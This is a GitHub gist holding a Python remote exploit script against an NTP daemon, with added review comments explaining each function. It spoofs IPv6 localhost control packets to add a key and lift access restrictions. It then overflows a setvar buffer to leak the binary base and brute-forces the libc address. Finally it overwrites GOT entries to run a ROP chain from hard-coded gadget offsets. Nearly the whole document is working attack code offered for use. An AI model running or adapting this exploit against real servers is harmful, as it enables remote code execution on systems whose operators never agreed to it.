# Gist stephenR/c57ea2fa2c686dea26d9 -- created February 4, 2016 12:38.
# GitHub notice: this file contains hidden or bidirectional Unicode text that
# may be interpreted or compiled differently than what appears below. To
# review, open the file in an editor that reveals hidden Unicode characters.
#!/usr/bin/env python | |
from socket import socket, AF_INET, SOCK_DGRAM, timeout | |
import hashlib | |
import time | |
import struct | |
from scapy.all import sendp, Ether, IPv6, UDP, Raw | |
from bitarray import bitarray | |
# --- Per-run settings --------------------------------------------------------
# Each PUT_..._HERE placeholder is a bare name and must be replaced with a real
# value before the script can run.
IP6 = PUT_TARGET_LINK_LOCAL_IPV6_HERE     # IPv6 destination used by send_rcv(spoof=True)
IP4 = PUT_TARGET_IPV4_HERE                # IPv4 destination used by send_rcv()
SRC_IP4 = PUT_YOUR_IPV4_HERE              # address written into the "restrict" line
IFACE = PUT_OUTGOING_INTERFACE_NAME_HERE  # interface name passed to scapy's sendp()

SPORT = 1234  # UDP source port of the scapy-built packets
PORT = 123    # UDP destination port for every packet

SOCKET_TIMEOUT = 0.2  # seconds; value passed to s.settimeout()
RETRY_TIMEOUT = 0.1   # seconds slept between reachability probes

# --- Offsets -----------------------------------------------------------------
# NOTE(review): these are hard-coded numbers with no derivation in this file;
# presumably they match one specific build of the target -- confirm.
strlen_off = 0x1720  # subtracted from the recovered strlen address to get libc_base
bin_base = 0         # overwritten by overwrite_got() with the result of leak_base()
rpkt_data = 0x5bee6
rpkt_data_CTL_MAX_DATA_LEN = 0x5c0ba
datapt = 0x5c0f8
_free_got = 0x4f230    # added to bin_base as the write target when use_strlen is false
_strlen_got = 0x4f520  # added to bin_base as the write target when use_strlen is true
remote_config_buffer = 0x55910  # added to bin_base in overwrite()/prepare_shellcode()

# Distance between the two offsets above; used as the filler length base.
DATAPT_OFF = datapt - rpkt_data
# Subtracted from the address recovered in leak_base() to obtain bin_base.
DATAEND_OFF = rpkt_data_CTL_MAX_DATA_LEN
class NullByteException(Exception):
    """Raised by overwrite() when a packed value is empty or contains a NUL byte.

    The single required argument ``msg`` becomes the exception message.
    """

    def __init__(self, msg):
        Exception.__init__(self, msg)
class ShortResponseException(Exception):
    """Raised by leak_base() when the received reply is shorter than required.

    The single required argument ``msg`` becomes the exception message.
    """

    def __init__(self, msg):
        Exception.__init__(self, msg)
def send_rcv(data, spoof=False, skip_recv=False):
    """Transmit ``data`` and, for the plain-socket path, optionally read a reply.

    Args:
        data: raw packet payload.
        spoof: when true, the payload is wrapped in an Ethernet/IPv6/UDP frame
            with source address ``::1`` and sent with scapy on ``IFACE``;
            nothing is read back.
        skip_recv: when true (and ``spoof`` is false), return right after
            sending through the module-level socket ``s``.

    Returns:
        The payload of one datagram (at most 1024 bytes) read from ``s``, or
        ``None`` when ``spoof`` or ``skip_recv`` is set.
    """
    if not spoof:
        s.sendto(data, (IP4, PORT))
        if skip_recv:
            return
        reply, _ = s.recvfrom(1024)
        return reply

    frame = Ether()/IPv6(src="::1", dst=IP6)/UDP(sport=SPORT, dport=PORT)/Raw(data)
    sendp(frame, iface=IFACE)
    return
def calc_mac(data):
    """Return the raw MD5 digest of the module-level ``auth_key`` followed by ``data``."""
    keyed = auth_key + data
    return hashlib.md5(keyed).digest()
def send_ctrl(data, mode, spoof=False, skip_recv=False, add_mac=True):
    """Wrap ``data`` in a control packet (first byte ``0x20 | 6``) and send it.

    Args:
        data: payload text; padded with NUL bytes as described below.
        mode: value of the second header byte (response/more/error/opcode).
        spoof: forwarded to send_rcv().
        skip_recv: forwarded to send_rcv().
        add_mac: when true, key id 65535 and the digest from calc_mac() are
            appended after the payload.

    Returns:
        Whatever send_rcv() returns.

    Padding: a non-empty payload is always extended by one to four NUL bytes
    (a length that is already a multiple of four gains four more). With
    ``add_mac`` set, another four NULs are added when the resulting length is
    a multiple of eight. The data-count header field holds the padded length.

    NOTE(review): the indentation of SOURCE was lost; the ``add_mac`` padding
    step is treated as a sibling of the non-empty check, not nested in it.
    """
    #print '[debug] send_ctrl {} bytes, mode {}, spoof: {}'.format(len(data), mode, spoof)
    if data:
        pad = 4 - (len(data) % 4)
        data = data + "\x00" * pad
    if add_mac and len(data) % 8 == 0:
        data += '\x00'*4

    header = ''.join([
        chr(0x20 | 6),                  # leap version mode
        chr(mode),                      # response, more, error, opcode
        'AA',                           # seq nr
        'BB',                           # status word
        '\x00\x00',                     # assoc id
        '\x00\x00',                     # offset
        struct.pack('>H', len(data)),   # data count
    ])
    ctrl_pkt = header + data

    if add_mac:
        # The digest covers header and payload only; the key id goes in between.
        mac = calc_mac(ctrl_pkt)
        ctrl_pkt += struct.pack('>I', 65535) + mac  # keyid, then digest
    return send_rcv(ctrl_pkt, spoof, skip_recv=skip_recv)
def send_private(data, mode, spoof=False):
    """Build a packet whose first byte is ``0x20 | 7`` around ``data`` and send it.

    Args:
        data: item payload placed after the 8-byte header.
        mode: request code stored in the fourth header byte.
        spoof: forwarded to send_rcv().

    Returns:
        Whatever send_rcv() returns.

    The payload is followed by an 8-byte timestamp (current Unix time minus
    one second plus 0x83aa7e80, i.e. 2208988800, then four zero bytes), key id
    65535 and the digest from calc_mac() over everything before the key id.
    """
    fields = [
        chr(0x20 | 7),                  # leap version mode
        chr(0x80),                      # auth sequence
        chr(3),                         # impl nr
        chr(mode),                      # request
        '\x00\x00',                     # err nitems
        struct.pack('>H', len(data)),   # mbz_itemsize
        data,
        struct.pack('>I', int(time.time()) - 1 + 0x83aa7e80),
        '\x00\x00\x00\x00',             # timestamp
    ]
    pkt = ''.join(fields)
    mac = calc_mac(pkt)
    pkt += struct.pack('>I', 65535) + mac  # keyid, then digest
    return send_rcv(pkt, spoof)
def add_ctl_key():
    """Send request code 33 via send_private() with key id 65535 as its item.

    The item is the big-endian 32-bit value 65535 followed by four NUL bytes;
    the packet goes out through the scapy path (``spoof=True``).
    NOTE(review): the meaning of request code 33 is not shown in this file;
    judging by the function name it selects the control key -- confirm.
    """
    item = struct.pack('>I', 65535) + '\x00'*4
    send_private(item, 33, spoof=True)
def lift_restrict():
    """Send a ``restrict <SRC_IP4>`` line with opcode 8 through the scapy path."""
    command = 'restrict {}\n'.format(SRC_IP4)
    send_ctrl(command, 8, spoof=True)  # opcode 8 (original comment: "set variable")
def pack_addr(addr):
    """Return ``addr`` minus a length adjustment, packed little-endian.

    The adjustment is the length of ``'a=' + 'E' * (DATAPT_OFF - 2)`` plus the
    number of bytes ``addr`` occupies once packed as ``<Q`` with trailing NUL
    bytes stripped. The adjusted value is packed and stripped the same way.

    Raises:
        AssertionError: if the adjusted value packs to a different length than
            the original one.
    """
    original = struct.pack('<Q', addr).rstrip('\x00')
    prefix_len = len('a=') + len('E' * (DATAPT_OFF - 2))
    shifted = addr - (prefix_len + len(original))
    packed = struct.pack('<Q', shifted).rstrip('\x00')
    # The subtraction must not change how many significant bytes there are.
    assert len(packed) == len(original)
    return packed
def overwrite_datapt(bytes):
    """Set variable ``a`` to filler plus ``bytes``, read it back, return a reply.

    Args:
        bytes: non-empty string without NUL bytes, appended after
            ``DATAPT_OFF - 2`` filler characters.

    Returns:
        The payload of the datagram received *after* the one that send_ctrl()
        already consumed for the read request (up to 4096 bytes).

    Raises:
        AssertionError: if ``bytes`` is empty or contains a NUL byte.
    """
    print('[*] overwriting datapt with {} bytes'.format(len(bytes)))
    assert bytes and '\x00' not in bytes
    filler = 'i'*(DATAPT_OFF-2)
    send_ctrl('setvar a = {}\n'.format(filler + bytes), 8)  # opcode 8 carrying a setvar line
    send_ctrl("a=", 2)  # read var; its first reply is read and dropped inside send_ctrl
    return s.recvfrom(4096)[0]
def leak_base(bytes):
    """Derive a base address from the reply returned by overwrite_datapt().

    Five bytes starting at offset ``DATAPT_OFF + 12 + 8`` of the reply are
    zero-extended to eight bytes, decoded as a little-endian integer, and
    ``DATAEND_OFF`` is subtracted from the result.

    Args:
        bytes: forwarded unchanged to overwrite_datapt().

    Raises:
        ShortResponseException: if the reply is shorter than
            ``DATAPT_OFF + 8 + 8 + 12 + 8`` bytes.
    """
    response = overwrite_datapt(bytes)
    needed = DATAPT_OFF + 8 + 8 + 12 + 8
    if len(response) < needed:
        raise ShortResponseException('response too short got {}, want {}'.format(len(response), needed))
    start = DATAPT_OFF + 12 + 8
    raw = response[start:start + 5] + '\x00'*3
    (dataend_addr,) = struct.unpack('<Q', raw)
    return dataend_addr - DATAEND_OFF
def overwrite(what, where, rdi, rsp_8='', use_strlen=True):
    """Send the setvar/read sequence built from ``what`` and ``where``.

    Args:
        what: integer; packed as little-endian ``<Q`` with trailing NUL bytes
            stripped and stored in variable ``y``.
        where: integer; ``where - 5`` is run through pack_addr() and stored,
            after ``DATAPT_OFF - 2`` filler characters, in variable ``x``.
        rdi: value formatted into variable ``z``.
        rsp_8: text appended after ``z=`` in the final read request.
        use_strlen: when true, ``,z=<rsp_8>`` is added to the read request.

    Raises:
        NullByteException: if either packed value is empty or contains a NUL.

    The final read request is sent without waiting for a reply.

    NOTE(review): the indentation of SOURCE was lost. The prepare_stack(),
    prepare_shellcode() and opcode-8 steps are kept at function level here
    rather than inside ``if use_strlen``; every caller in this file passes
    ``use_strlen=True``, for which both readings behave the same -- confirm.
    """
    print('[*] writing 0x{:x} to 0x{:x}'.format(what, where))
    target = pack_addr(where-5) #TODO 3 or 5?
    value = struct.pack('<Q', what).rstrip('\x00')
    for field in (target, value):
        if not field or '\x00' in field:
            raise NullByteException('null byte in what or where')

    # Three opcode-8 packets, each carrying one setvar line.
    send_ctrl('setvar x = "{}"'.format('H'*(DATAPT_OFF-2) + target) + '\n', 8)
    send_ctrl('setvar y = "{}"'.format(value) + '\n', 8)
    send_ctrl('setvar z = "{}"'.format(rdi) + '\n', 8)

    read_var_str = 'x=,y='
    if use_strlen:
        read_var_str += ',z={}'.format(rsp_8)

    print('[*] preparing the stack')
    prepare_stack(gadget2+libc_base, bin_base+remote_config_buffer+8)
    print('[*] preparing the shellcode')
    prepare_shellcode()
    print('[*] setting up remote config buffer at address 0x{:x}'.format(bin_base+remote_config_buffer))
    send_ctrl(shellcode, 8)
    send_ctrl(read_var_str, 2, skip_recv=True)  # read var, reply not awaited here
def add_trap():
    """Send an empty opcode-6 control packet and wait for its reply.

    The socket timeout is set to ``SOCKET_TIMEOUT`` for the exchange and put
    back to blocking mode afterwards, both on success and on timeout.

    Raises:
        socket.timeout: re-raised when no reply arrives in time.

    NOTE(review): the original comment on the send called this "set variable";
    given the function name, opcode 6 is presumably the set-trap request --
    confirm.
    """
    s.settimeout(SOCKET_TIMEOUT)
    try:
        send_ctrl('', 6)
    except timeout as err:
        s.settimeout(None)
        raise err
    else:
        s.settimeout(None)
def is_up():
    """Probe the target with a fixed 48-byte packet and report whether it replied.

    Returns:
        True if send_rcv() received a datagram within ``SOCKET_TIMEOUT``
        seconds, False if the receive timed out. The socket is switched back
        to blocking mode in both cases.
    """
    pkt = ''.join([
        chr(0x20 | 0x3),
        chr(0x1),
        'b'*8,
        'c'*8,
        'd'*8,
        'jklmnopq',
        '123456',
        'A'*8,
    ])
    try:
        s.settimeout(SOCKET_TIMEOUT)
        send_rcv(pkt)
    except timeout:
        alive = False
    else:
        alive = True
    s.settimeout(None)
    return alive
def prepare_stack(ret_addr, buf_addr):
    """Send a 48-byte packet whose last 16 bytes encode the two addresses.

    Args:
        ret_addr: integer placed in the final eight bytes.
        buf_addr: integer placed in the eight bytes before that.

    Each value is packed as big-endian ``>Q`` and emitted with its two 4-byte
    halves swapped (low half first). The leading 32 bytes use the same filler
    pattern as the probe in is_up(), shortened to ``'jklmno'``. One reply is
    read by send_rcv() and discarded.
    """
    ret_be = struct.pack('>Q', ret_addr)
    buf_be = struct.pack('>Q', buf_addr)
    pkt = ''.join([
        chr(0x20 | 0x3),
        chr(0x1),
        'b'*8,
        'c'*8,
        'd'*8,
        'jklmno',
        buf_be[4:], buf_be[:4],
        ret_be[4:], ret_be[:4],
    ])
    send_rcv(pkt)
def trigger_crash():
    """Set variable ``a`` to filler plus eight ``'a'`` characters and read it back.

    A receive timeout during the exchange is swallowed. The read request is
    sent without waiting for a reply. The socket timeout is left at
    ``SOCKET_TIMEOUT`` when the function returns.
    """
    payload = 'setvar a = ' + 'H'*(DATAPT_OFF-2) + 'a'*8 + '\n'
    try:
        s.settimeout(SOCKET_TIMEOUT)
        send_ctrl(payload, 8)               # opcode 8 carrying a setvar line
        send_ctrl('a=', 2, skip_recv=True)  # read var
    except timeout:
        pass
# Key material that calc_mac() prepends to the packet before hashing.
auth_key = "AAAA"
# Module-wide UDP socket; assigned by prepare_connection().
s = None
def prepare_connection():
    """Create a fresh UDP socket in ``s`` and run the three setup requests.

    Blocks, probing with is_up() every ``RETRY_TIMEOUT`` seconds, until the
    target answers; then calls add_ctl_key(), lift_restrict() and add_trap()
    in that order. A previously assigned socket is replaced without being
    closed.
    """
    global s
    s = socket(AF_INET, SOCK_DGRAM)
    while True:
        if is_up():
            break
        print('[*] host not reachable, retrying in {} second'.format(RETRY_TIMEOUT))
        time.sleep(RETRY_TIMEOUT)

    steps = (
        ('[*] adding ctl key', add_ctl_key),
        ('[*] lifting restrictions', lift_restrict),
        ('[*] adding trap', add_trap),
    )
    for banner, step in steps:
        print(banner)
        step()
def crash():
    """Run prepare_connection() and then trigger_crash()."""
    prepare_connection()
    trigger_crash()
def overwrite_got(what, rdi, rsp_8, use_strlen=True):
    """Reconnect, refresh ``bin_base`` via leak_base(), then call overwrite().

    Args:
        what: integer forwarded to overwrite().
        rdi: forwarded to overwrite().
        rsp_8: forwarded to overwrite().
        use_strlen: selects ``_strlen_got`` (true) or ``_free_got`` (false) as
            the offset added to ``bin_base``; also forwarded to overwrite().

    The function calls itself again, with the same arguments, when leak_base()
    raises ShortResponseException or when overwrite() raises NullByteException
    (in the latter case trigger_crash() runs first). There is no retry limit.

    After overwrite() one more datagram is read with ``SOCKET_TIMEOUT`` and
    discarded. A socket.timeout raised by that read, or inside leak_base(), is
    not caught here.
    """
    global bin_base
    prepare_connection()
    where = _strlen_got if use_strlen else _free_got

    print('[*] leaking base address')
    try:
        s.settimeout(SOCKET_TIMEOUT)
        bin_base = leak_base('\xfc\x20')
        s.settimeout(None)
    except ShortResponseException:
        print('[*] leaking base address failed, retrying')
        return overwrite_got(what, rdi, rsp_8, use_strlen)
    print('[*] binary at 0x{:x}'.format(bin_base))

    try:
        overwrite(what, bin_base+where, rdi, rsp_8, use_strlen=use_strlen)
        s.settimeout(SOCKET_TIMEOUT)
        # The hex-encoded reply is computed and thrown away, as in the original.
        s.recvfrom(1024)[0].encode('hex')
    except NullByteException:
        print('[*] null byte in address, crash and retry')
        trigger_crash()
        return overwrite_got(what, rdi, rsp_8, use_strlen)
# Rebuilt from scratch by prepare_shellcode(); sent by overwrite() with opcode 8.
shellcode = ""
# Tail appended by prepare_shellcode(); here just an eight-byte filler.
ropchain = "A" * 8
def prepare_shellcode():
    """Rebuild the module-level ``shellcode`` string from the current bases.

    The result is a newline plus seven NUL bytes, a sequence of 8-byte slots
    (filler letters or little-endian ``<Q`` values computed from ``libc_base``,
    ``bin_base`` and the gadget offsets), sixteen ``'G'`` characters, and
    finally ``ropchain``. Per-slot notes are the original author's.
    """
    global shellcode
    pieces = [
        '\n'+'\x00'*7,
        'D'*8,
        struct.pack('<Q', libc_base+gadget7),
        struct.pack('<Q', libc_base+gadget3),
        'E'*8,
        'F'*8,
        struct.pack('<Q', libc_base+gadget5),                     # new rdi
        struct.pack('<Q', bin_base+remote_config_buffer+8),       # new rdi
        struct.pack('<Q', libc_base+gadget6),                     # rbx
        struct.pack('<Q', libc_base+gadget4),
        'G'*16,
        ropchain,
    ]
    shellcode = ''.join(pieces)
# Set by the search loop at the bottom of the file to strlen_addr - strlen_off.
libc_base = 0

# Offsets added to libc_base; the trailing notes are the original author's.
gadget1 = 0x11065  # add rsp, x
gadget2 = 0x67d81  # mov rdi, r12
gadget3 = 0x438ba  # fix rbp
gadget4 = 0x1c6d7  # load rbx rdi+0x38
gadget5 = 0x5fa49  # mov rsi, r12
gadget6 = 0x56fd   # push rsi, pop rsp
gadget7 = 0x2bd06  # add rsp, n

# Candidate addresses containing any of these characters are skipped.
CHAR_BLACKLIST = '\x00\n"\xff'
# Top-level driver: search for the strlen address in three passes, one bit
# field per pass, then derive libc_base from it and issue the final
# overwrite_got() call.
#
# NOTE(review): the indentation of SOURCE was lost. The nesting below (second
# attempt only after the first is_up() succeeds; the address is accepted and
# the pass ends only after the second is_up() succeeds) is a reconstruction
# based on the "found candidate, verifying" message -- confirm against the
# original gist.
ranges = [xrange(1,2**4), reversed(xrange(1,2**8)), xrange(1,2**5)]
shifts = [12, 16, 24]
strlen_addr = strlen_off
for i in range(3):
    for a in ranges[i]:
        addr = (a<<shifts[i]) + strlen_addr
        if i == 2:
            # Only the last pass adds this constant to the candidate.
            addr += 0x80000000
        print('[*] trying strlen address 0x{:x}'.format(addr))
        # Skip candidates whose significant bytes include a blacklisted character.
        if any(c in CHAR_BLACKLIST for c in struct.pack('<Q', addr).rstrip('\x00')):
            continue
        overwrite_got(addr, 'A', 'A')
        print('[*] found candidate, verifying')
        if not is_up():
            continue
        trigger_crash()
        overwrite_got(addr, 'A', 'A')
        if not is_up():
            continue
        trigger_crash()
        strlen_addr = addr
        print('[*] found next byte. New address: 0x{:x}'.format(addr))
        break
strlen_addr += 0x7fff00000000
libc_base = strlen_addr - strlen_off
print('[*] found libc base: 0x{:x}'.format(libc_base))
overwrite_got(libc_base+gadget1, 'A', 'A')
# End of gist. (GitHub page footer: "Sign up for free to join this
# conversation on GitHub. Already have an account? Sign in to comment.")